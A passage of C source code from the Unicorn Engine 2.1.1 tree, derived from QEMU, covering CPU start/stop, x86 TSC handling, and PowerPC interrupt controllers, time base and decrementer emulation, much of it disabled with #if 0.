    cpu->nr_threads = 1;

    QTAILQ_INIT(&cpu->breakpoints);
    QTAILQ_INIT(&cpu->watchpoints);

    /* cpu_exec_initfn(cpu); */
    cpu->num_ases = 1;
    cpu->as = &(cpu->uc->address_space_memory);
    cpu->memory = cpu->uc->system_memory;
}

void cpu_stop(struct uc_struct *uc)
{
    if (uc->cpu) {
        uc->cpu->stop = false;
        uc->cpu->stopped = true;
        cpu_exit(uc->cpu);
    }
}

unicorn-2.1.1/qemu/hw/i386/x86.c

/*
 * QEMU PC System Emulator
 *
 * Copyright (c) 2003-2004 Fabrice Bellard
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */
/* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */

#include "qemu/compiler.h"
#include "sysemu/sysemu.h"
#include "target/i386/cpu.h"

/* TSC handling */
uint64_t cpu_get_tsc(CPUX86State *env)
{
    return cpu_get_ticks();
}

unicorn-2.1.1/qemu/hw/ppc/ppc.c

/*
 * QEMU generic PowerPC hardware System Emulator
 *
 * Copyright (c) 2003-2007 Jocelyn Mayer
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

#include "qemu/osdep.h"
#include "cpu.h"
//#include "hw/irq.h"
#include "hw/ppc/ppc.h"
//#include "hw/ppc/ppc_e500.h"
#include "qemu/timer.h"
#include "sysemu/cpus.h"
//#include "qemu/log.h"
//#include "qemu/main-loop.h"
//#include "qemu/error-report.h"
//#include "sysemu/kvm.h"
//#include "sysemu/runstate.h"
//#include "kvm_ppc.h"
//#include "migration/vmstate.h"
//#include "trace.h"

//#define PPC_DEBUG_IRQ
//#define PPC_DEBUG_TB

#ifdef PPC_DEBUG_IRQ
#  define LOG_IRQ(...) qemu_log_mask(CPU_LOG_INT, ## __VA_ARGS__)
#else
#  define LOG_IRQ(...) do { } while (0)
#endif

#ifdef PPC_DEBUG_TB
#  define LOG_TB(...) qemu_log(__VA_ARGS__)
#else
#  define LOG_TB(...)
do { } while (0) #endif #if 0 static void cpu_ppc_tb_stop (CPUPPCState *env); static void cpu_ppc_tb_start (CPUPPCState *env); #endif void ppc_set_irq(PowerPCCPU *cpu, int n_IRQ, int level) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; #if 0 unsigned int old_pending; old_pending = env->pending_interrupts; #endif if (level) { env->pending_interrupts |= 1 << n_IRQ; cpu_interrupt(cs, CPU_INTERRUPT_HARD); } else { env->pending_interrupts &= ~(1 << n_IRQ); if (env->pending_interrupts == 0) { cpu_reset_interrupt(cs, CPU_INTERRUPT_HARD); } } #if 0 if (old_pending != env->pending_interrupts) { kvmppc_set_interrupt(cpu, n_IRQ, level); } #endif LOG_IRQ("%s: %p n_IRQ %d level %d => pending %08" PRIx32 "req %08x\n", __func__, env, n_IRQ, level, env->pending_interrupts, CPU(cpu)->interrupt_request); } #if 0 /* PowerPC 6xx / 7xx internal IRQ controller */ static void ppc6xx_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int cur_level; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, env, pin, level); cur_level = (env->irq_input_state >> pin) & 1; /* Don't generate spurious events */ if ((cur_level == 1 && level == 0) || (cur_level == 0 && level != 0)) { CPUState *cs = CPU(cpu); switch (pin) { case PPC6xx_INPUT_TBEN: /* Level sensitive - active high */ LOG_IRQ("%s: %s the time base\n", __func__, level ? "start" : "stop"); if (level) { cpu_ppc_tb_start(env); } else { cpu_ppc_tb_stop(env); } case PPC6xx_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case PPC6xx_INPUT_SMI: /* Level sensitive - active high */ LOG_IRQ("%s: set the SMI IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_SMI, level); break; case PPC6xx_INPUT_MCP: /* Negative edge sensitive */ /* XXX: TODO: actual reaction may depends on HID0 status * 603/604/740/750: check HID0[EMCP] */ if (cur_level == 1 && level == 0) { LOG_IRQ("%s: raise machine check state\n", __func__); ppc_set_irq(cpu, PPC_INTERRUPT_MCK, 1); } break; case PPC6xx_INPUT_CKSTP_IN: /* Level sensitive - active low */ /* XXX: TODO: relay the signal to CKSTP_OUT pin */ /* XXX: Note that the only way to restart the CPU is to reset it */ if (level) { LOG_IRQ("%s: stop the CPU\n", __func__); cs->halted = 1; } break; case PPC6xx_INPUT_HRESET: /* Level sensitive - active low */ if (level) { LOG_IRQ("%s: reset the CPU\n", __func__); cpu_interrupt(cs, CPU_INTERRUPT_RESET); } break; case PPC6xx_INPUT_SRESET: LOG_IRQ("%s: set the RESET IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_RESET, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } if (level) env->irq_input_state |= 1 << pin; else env->irq_input_state &= ~(1 << pin); } } #endif void ppc6xx_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&ppc6xx_set_irq, cpu, PPC6xx_INPUT_NB); #endif } #if defined(TARGET_PPC64) #if 0 /* PowerPC 970 internal IRQ controller */ static void ppc970_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int cur_level; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, env, pin, level); cur_level = (env->irq_input_state >> pin) & 1; /* Don't generate spurious events */ if ((cur_level == 1 && level == 0) || (cur_level == 0 && level != 0)) { CPUState *cs = CPU(cpu); switch (pin) { case PPC970_INPUT_INT: /* Level 
sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case PPC970_INPUT_THINT: /* Level sensitive - active high */ LOG_IRQ("%s: set the SMI IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_THERM, level); break; case PPC970_INPUT_MCP: /* Negative edge sensitive */ /* XXX: TODO: actual reaction may depends on HID0 status * 603/604/740/750: check HID0[EMCP] */ if (cur_level == 1 && level == 0) { LOG_IRQ("%s: raise machine check state\n", __func__); ppc_set_irq(cpu, PPC_INTERRUPT_MCK, 1); } break; case PPC970_INPUT_CKSTP: /* Level sensitive - active low */ /* XXX: TODO: relay the signal to CKSTP_OUT pin */ if (level) { LOG_IRQ("%s: stop the CPU\n", __func__); cs->halted = 1; } else { LOG_IRQ("%s: restart the CPU\n", __func__); cs->halted = 0; // qemu_cpu_kick(cs); } break; case PPC970_INPUT_HRESET: /* Level sensitive - active low */ if (level) { cpu_interrupt(cs, CPU_INTERRUPT_RESET); } break; case PPC970_INPUT_SRESET: LOG_IRQ("%s: set the RESET IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_RESET, level); break; case PPC970_INPUT_TBEN: LOG_IRQ("%s: set the TBEN state to %d\n", __func__, level); /* XXX: TODO */ break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } if (level) env->irq_input_state |= 1 << pin; else env->irq_input_state &= ~(1 << pin); } } #endif void ppc970_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&ppc970_set_irq, cpu, PPC970_INPUT_NB); #endif } #if 0 /* POWER7 internal IRQ controller */ static void power7_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, &cpu->env, pin, level); switch (pin) { case POWER7_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } } #endif void ppcPOWER7_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&power7_set_irq, cpu, POWER7_INPUT_NB); #endif } #if 0 /* POWER9 internal IRQ controller */ static void power9_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, &cpu->env, pin, level); switch (pin) { case POWER9_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case POWER9_INPUT_HINT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_HVIRT, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } } #endif void ppcPOWER9_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&power9_set_irq, cpu, POWER9_INPUT_NB); #endif } #endif /* defined(TARGET_PPC64) */ void ppc40x_core_reset(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; target_ulong dbsr; // qemu_log_mask(CPU_LOG_RESET, "Reset PowerPC core\n"); cpu_interrupt(CPU(cpu), CPU_INTERRUPT_RESET); dbsr = env->spr[SPR_40x_DBSR]; dbsr &= ~0x00000300; dbsr |= 0x00000100; env->spr[SPR_40x_DBSR] = dbsr; } void ppc40x_chip_reset(PowerPCCPU 
*cpu) { CPUPPCState *env = &cpu->env; target_ulong dbsr; // qemu_log_mask(CPU_LOG_RESET, "Reset PowerPC chip\n"); cpu_interrupt(CPU(cpu), CPU_INTERRUPT_RESET); /* XXX: TODO reset all internal peripherals */ dbsr = env->spr[SPR_40x_DBSR]; dbsr &= ~0x00000300; dbsr |= 0x00000200; env->spr[SPR_40x_DBSR] = dbsr; } void ppc40x_system_reset(PowerPCCPU *cpu) { // qemu_log_mask(CPU_LOG_RESET, "Reset PowerPC system\n"); // qemu_system_reset_request(SHUTDOWN_CAUSE_GUEST_RESET); } void store_40x_dbcr0(CPUPPCState *env, uint32_t val) { PowerPCCPU *cpu = env_archcpu(env); switch ((val >> 28) & 0x3) { case 0x0: /* No action */ break; case 0x1: /* Core reset */ ppc40x_core_reset(cpu); break; case 0x2: /* Chip reset */ ppc40x_chip_reset(cpu); break; case 0x3: /* System reset */ ppc40x_system_reset(cpu); break; } } #if 0 /* PowerPC 40x internal IRQ controller */ static void ppc40x_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int cur_level; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, env, pin, level); cur_level = (env->irq_input_state >> pin) & 1; /* Don't generate spurious events */ if ((cur_level == 1 && level == 0) || (cur_level == 0 && level != 0)) { CPUState *cs = CPU(cpu); switch (pin) { case PPC40x_INPUT_RESET_SYS: if (level) { LOG_IRQ("%s: reset the PowerPC system\n", __func__); ppc40x_system_reset(cpu); } break; case PPC40x_INPUT_RESET_CHIP: if (level) { LOG_IRQ("%s: reset the PowerPC chip\n", __func__); ppc40x_chip_reset(cpu); } break; case PPC40x_INPUT_RESET_CORE: /* XXX: TODO: update DBSR[MRR] */ if (level) { LOG_IRQ("%s: reset the PowerPC core\n", __func__); ppc40x_core_reset(cpu); } break; case PPC40x_INPUT_CINT: /* Level sensitive - active high */ LOG_IRQ("%s: set the critical IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_CEXT, level); break; case PPC40x_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the external IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case PPC40x_INPUT_HALT: /* Level sensitive - active low */ if (level) { LOG_IRQ("%s: stop the CPU\n", __func__); cs->halted = 1; } else { LOG_IRQ("%s: restart the CPU\n", __func__); cs->halted = 0; // qemu_cpu_kick(cs); } break; case PPC40x_INPUT_DEBUG: /* Level sensitive - active high */ LOG_IRQ("%s: set the debug pin state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_DEBUG, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } if (level) env->irq_input_state |= 1 << pin; else env->irq_input_state &= ~(1 << pin); } } #endif void ppc40x_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&ppc40x_set_irq, cpu, PPC40x_INPUT_NB); #endif } #if 0 /* PowerPC E500 internal IRQ controller */ static void ppce500_set_irq(void *opaque, int pin, int level) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int cur_level; LOG_IRQ("%s: env %p pin %d level %d\n", __func__, env, pin, level); cur_level = (env->irq_input_state >> pin) & 1; /* Don't generate spurious events */ if ((cur_level == 1 && level == 0) || (cur_level == 0 && level != 0)) { switch (pin) { case PPCE500_INPUT_MCK: if (level) { LOG_IRQ("%s: reset the PowerPC system\n", __func__); // qemu_system_reset_request(SHUTDOWN_CAUSE_GUEST_RESET); } break; case PPCE500_INPUT_RESET_CORE: if (level) { LOG_IRQ("%s: reset the PowerPC core\n", __func__); ppc_set_irq(cpu, PPC_INTERRUPT_MCK, level); } break; case 
PPCE500_INPUT_CINT: /* Level sensitive - active high */ LOG_IRQ("%s: set the critical IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_CEXT, level); break; case PPCE500_INPUT_INT: /* Level sensitive - active high */ LOG_IRQ("%s: set the core IRQ state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_EXT, level); break; case PPCE500_INPUT_DEBUG: /* Level sensitive - active high */ LOG_IRQ("%s: set the debug pin state to %d\n", __func__, level); ppc_set_irq(cpu, PPC_INTERRUPT_DEBUG, level); break; default: /* Unknown pin - do nothing */ LOG_IRQ("%s: unknown IRQ pin %d\n", __func__, pin); return; } if (level) env->irq_input_state |= 1 << pin; else env->irq_input_state &= ~(1 << pin); } } #endif void ppce500_irq_init(PowerPCCPU *cpu) { #if 0 CPUPPCState *env = &cpu->env; env->irq_inputs = (void **)qemu_allocate_irqs(&ppce500_set_irq, cpu, PPCE500_INPUT_NB); #endif } /* Enable or Disable the E500 EPR capability */ void ppce500_set_mpic_proxy(bool enabled) { #if 0 CPUState *cs; CPU_FOREACH(cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); cpu->env.mpic_proxy = enabled; if (kvm_enabled()) { kvmppc_set_mpic_proxy(cpu, enabled); } } #endif } /*****************************************************************************/ /* PowerPC time base and decrementer emulation */ uint64_t cpu_ppc_get_tb(ppc_tb_t *tb_env, uint64_t vmclk, int64_t tb_offset) { /* TB time in tb periods */ return muldiv64(vmclk, tb_env->tb_freq, NANOSECONDS_PER_SECOND) + tb_offset; } uint64_t cpu_ppc_load_tbl (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; #if 0 if (kvm_enabled()) { return env->spr[SPR_TBL]; } #endif tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); LOG_TB("%s: tb %016" PRIx64 "\n", __func__, tb); return tb; } static inline uint32_t _cpu_ppc_load_tbu(CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); LOG_TB("%s: tb %016" PRIx64 "\n", __func__, tb); return tb >> 32; } uint32_t cpu_ppc_load_tbu (CPUPPCState *env) { #if 0 if (kvm_enabled()) { return env->spr[SPR_TBU]; } #endif return _cpu_ppc_load_tbu(env); } static inline void cpu_ppc_store_tb(ppc_tb_t *tb_env, uint64_t vmclk, int64_t *tb_offsetp, uint64_t value) { *tb_offsetp = value - muldiv64(vmclk, tb_env->tb_freq, NANOSECONDS_PER_SECOND); LOG_TB("%s: tb %016" PRIx64 " offset %08" PRIx64 "\n", __func__, value, *tb_offsetp); } void cpu_ppc_store_tbl (CPUPPCState *env, uint32_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); tb &= 0xFFFFFFFF00000000ULL; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->tb_offset, tb | (uint64_t)value); } static inline void _cpu_ppc_store_tbu(CPUPPCState *env, uint32_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); tb &= 0x00000000FFFFFFFFULL; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->tb_offset, ((uint64_t)value << 32) | tb); } void cpu_ppc_store_tbu (CPUPPCState *env, uint32_t value) { _cpu_ppc_store_tbu(env, value); } uint64_t cpu_ppc_load_atbl (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->atb_offset); LOG_TB("%s: tb %016" PRIx64 "\n", __func__, tb); return tb; } uint32_t cpu_ppc_load_atbu (CPUPPCState *env) { ppc_tb_t *tb_env 
= env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->atb_offset); LOG_TB("%s: tb %016" PRIx64 "\n", __func__, tb); return tb >> 32; } void cpu_ppc_store_atbl (CPUPPCState *env, uint32_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->atb_offset); tb &= 0xFFFFFFFF00000000ULL; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->atb_offset, tb | (uint64_t)value); } void cpu_ppc_store_atbu (CPUPPCState *env, uint32_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->atb_offset); tb &= 0x00000000FFFFFFFFULL; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->atb_offset, ((uint64_t)value << 32) | tb); } uint64_t cpu_ppc_load_vtb(CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; return cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->vtb_offset); } void cpu_ppc_store_vtb(CPUPPCState *env, uint64_t value) { ppc_tb_t *tb_env = env->tb_env; cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->vtb_offset, value); } void cpu_ppc_store_tbu40(CPUPPCState *env, uint64_t value) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb; tb = cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->tb_offset); tb &= 0xFFFFFFUL; tb |= (value & ~0xFFFFFFUL); cpu_ppc_store_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), &tb_env->tb_offset, tb); } #if 0 static void cpu_ppc_tb_stop (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb, atb, vmclk; /* If the time base is already frozen, do nothing */ if (tb_env->tb_freq != 0) { vmclk = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); /* Get the time base */ tb = cpu_ppc_get_tb(tb_env, vmclk, tb_env->tb_offset); /* Get the alternate time base */ atb = cpu_ppc_get_tb(tb_env, vmclk, tb_env->atb_offset); /* Store the time base value (ie compute the current offset) */ cpu_ppc_store_tb(tb_env, vmclk, &tb_env->tb_offset, tb); /* Store the alternate time base value (compute the current offset) */ cpu_ppc_store_tb(tb_env, vmclk, &tb_env->atb_offset, atb); /* Set the time base frequency to zero */ tb_env->tb_freq = 0; /* Now, the time bases are frozen to tb_offset / atb_offset value */ } } static void cpu_ppc_tb_start (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t tb, atb, vmclk; /* If the time base is not frozen, do nothing */ if (tb_env->tb_freq == 0) { vmclk = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); /* Get the time base from tb_offset */ tb = tb_env->tb_offset; /* Get the alternate time base from atb_offset */ atb = tb_env->atb_offset; /* Restore the tb frequency from the decrementer frequency */ tb_env->tb_freq = tb_env->decr_freq; /* Store the time base value */ cpu_ppc_store_tb(tb_env, vmclk, &tb_env->tb_offset, tb); /* Store the alternate time base value */ cpu_ppc_store_tb(tb_env, vmclk, &tb_env->atb_offset, atb); } } #endif bool ppc_decr_clear_on_delivery(CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; int flags = PPC_DECR_UNDERFLOW_TRIGGERED | PPC_DECR_UNDERFLOW_LEVEL; return ((tb_env->flags & flags) == PPC_DECR_UNDERFLOW_TRIGGERED); } static inline int64_t _cpu_ppc_load_decr(CPUPPCState *env, uint64_t next) { ppc_tb_t *tb_env = env->tb_env; int64_t decr, diff; diff = next - qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); if (diff >= 0) { decr = muldiv64(diff, tb_env->decr_freq, NANOSECONDS_PER_SECOND); } else if (tb_env->flags & PPC_TIMER_BOOKE) { decr = 0; } 
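    /* (added note) past the programmed tick, non-BookE DECs keep counting
     * down, so the guest reads back a negative (signed) value: */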
else { #ifdef _MSC_VER decr = 0 - muldiv64(0 - diff, tb_env->decr_freq, NANOSECONDS_PER_SECOND); #else decr = -muldiv64(-diff, tb_env->decr_freq, NANOSECONDS_PER_SECOND); #endif } LOG_TB("%s: %016" PRIx64 "\n", __func__, decr); return decr; } target_ulong cpu_ppc_load_decr(CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; uint64_t decr; #if 0 if (kvm_enabled()) { return env->spr[SPR_DECR]; } #endif decr = _cpu_ppc_load_decr(env, tb_env->decr_next); /* * If large decrementer is enabled then the decrementer is signed extened * to 64 bits, otherwise it is a 32 bit value. */ if (env->spr[SPR_LPCR] & LPCR_LD) { return decr; } return (uint32_t) decr; } target_ulong cpu_ppc_load_hdecr(CPUPPCState *env) { PowerPCCPU *cpu = env_archcpu(env); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); ppc_tb_t *tb_env = env->tb_env; uint64_t hdecr; hdecr = _cpu_ppc_load_decr(env, tb_env->hdecr_next); /* * If we have a large decrementer (POWER9 or later) then hdecr is sign * extended to 64 bits, otherwise it is 32 bits. */ if (pcc->lrg_decr_bits > 32) { return hdecr; } return (uint32_t) hdecr; } uint64_t cpu_ppc_load_purr (CPUPPCState *env) { ppc_tb_t *tb_env = env->tb_env; return cpu_ppc_get_tb(tb_env, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL), tb_env->purr_offset); } /* When decrementer expires, * all we need to do is generate or queue a CPU exception */ static inline void cpu_ppc_decr_excp(PowerPCCPU *cpu) { /* Raise it */ LOG_TB("raise decrementer exception\n"); ppc_set_irq(cpu, PPC_INTERRUPT_DECR, 1); } static inline void cpu_ppc_decr_lower(PowerPCCPU *cpu) { ppc_set_irq(cpu, PPC_INTERRUPT_DECR, 0); } static inline void cpu_ppc_hdecr_excp(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; /* Raise it */ LOG_TB("raise hv decrementer exception\n"); /* The architecture specifies that we don't deliver HDEC * interrupts in a PM state. Not only they don't cause a * wakeup but they also get effectively discarded. */ if (!env->resume_as_sreset) { ppc_set_irq(cpu, PPC_INTERRUPT_HDECR, 1); } } static inline void cpu_ppc_hdecr_lower(PowerPCCPU *cpu) { ppc_set_irq(cpu, PPC_INTERRUPT_HDECR, 0); } static void __cpu_ppc_store_decr(PowerPCCPU *cpu, uint64_t *nextp, QEMUTimer *timer, void (*raise_excp)(void *), void (*lower_excp)(PowerPCCPU *), target_ulong decr, target_ulong value, int nr_bits) { #if 0 CPUPPCState *env = &cpu->env; ppc_tb_t *tb_env = env->tb_env; uint64_t now, next; bool negative; /* Truncate value to decr_width and sign extend for simplicity */ value &= ((1ULL << nr_bits) - 1); negative = !!(value & (1ULL << (nr_bits - 1))); if (negative) { value |= (0xFFFFFFFFULL << nr_bits); } LOG_TB("%s: " TARGET_FMT_lx " => " TARGET_FMT_lx "\n", __func__, decr, value); #if 0 if (kvm_enabled()) { /* KVM handles decrementer exceptions, we don't need our own timer */ return; } #endif /* * Going from 2 -> 1, 1 -> 0 or 0 -> -1 is the event to generate a DEC * interrupt. * * If we get a really small DEC value, we can assume that by the time we * handled it we should inject an interrupt already. * * On MSB level based DEC implementations the MSB always means the interrupt * is pending, so raise it on those. * * On MSB edge based DEC implementations the MSB going from 0 -> 1 triggers * an edge interrupt, so raise it here too. 
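 *
 * Concretely (added illustration): with nr_bits = 32, storing 0xFFFFFFFF
 * truncates to a value whose bit 31 is set, so `negative` is true and the
 * sign extension above produces (int64_t)-1; a level-based DEC must keep
 * the interrupt line asserted for such values, which is the
 * PPC_DECR_UNDERFLOW_LEVEL test just below.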
*/ if ((value < 3) || ((tb_env->flags & PPC_DECR_UNDERFLOW_LEVEL) && negative) || ((tb_env->flags & PPC_DECR_UNDERFLOW_TRIGGERED) && negative && !(decr & (1ULL << (nr_bits - 1))))) { (*raise_excp)(cpu); return; } /* On MSB level based systems a 0 for the MSB stops interrupt delivery */ if (!negative && (tb_env->flags & PPC_DECR_UNDERFLOW_LEVEL)) { (*lower_excp)(cpu); } /* Calculate the next timer event */ now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); next = now + muldiv64(value, NANOSECONDS_PER_SECOND, tb_env->decr_freq); *nextp = next; /* Adjust timer */ timer_mod(timer, next); #endif } static inline void _cpu_ppc_store_decr(PowerPCCPU *cpu, target_ulong decr, target_ulong value, int nr_bits) { ppc_tb_t *tb_env = cpu->env.tb_env; __cpu_ppc_store_decr(cpu, &tb_env->decr_next, tb_env->decr_timer, tb_env->decr_timer->cb, &cpu_ppc_decr_lower, decr, value, nr_bits); } void cpu_ppc_store_decr(CPUPPCState *env, target_ulong value) { PowerPCCPU *cpu = env_archcpu(env); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); int nr_bits = 32; if (env->spr[SPR_LPCR] & LPCR_LD) { nr_bits = pcc->lrg_decr_bits; } _cpu_ppc_store_decr(cpu, cpu_ppc_load_decr(env), value, nr_bits); } static void cpu_ppc_decr_cb(void *opaque) { PowerPCCPU *cpu = opaque; cpu_ppc_decr_excp(cpu); } static inline void _cpu_ppc_store_hdecr(PowerPCCPU *cpu, target_ulong hdecr, target_ulong value, int nr_bits) { ppc_tb_t *tb_env = cpu->env.tb_env; if (tb_env->hdecr_timer != NULL) { __cpu_ppc_store_decr(cpu, &tb_env->hdecr_next, tb_env->hdecr_timer, tb_env->hdecr_timer->cb, &cpu_ppc_hdecr_lower, hdecr, value, nr_bits); } } void cpu_ppc_store_hdecr(CPUPPCState *env, target_ulong value) { PowerPCCPU *cpu = env_archcpu(env); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); _cpu_ppc_store_hdecr(cpu, cpu_ppc_load_hdecr(env), value, pcc->lrg_decr_bits); } static void 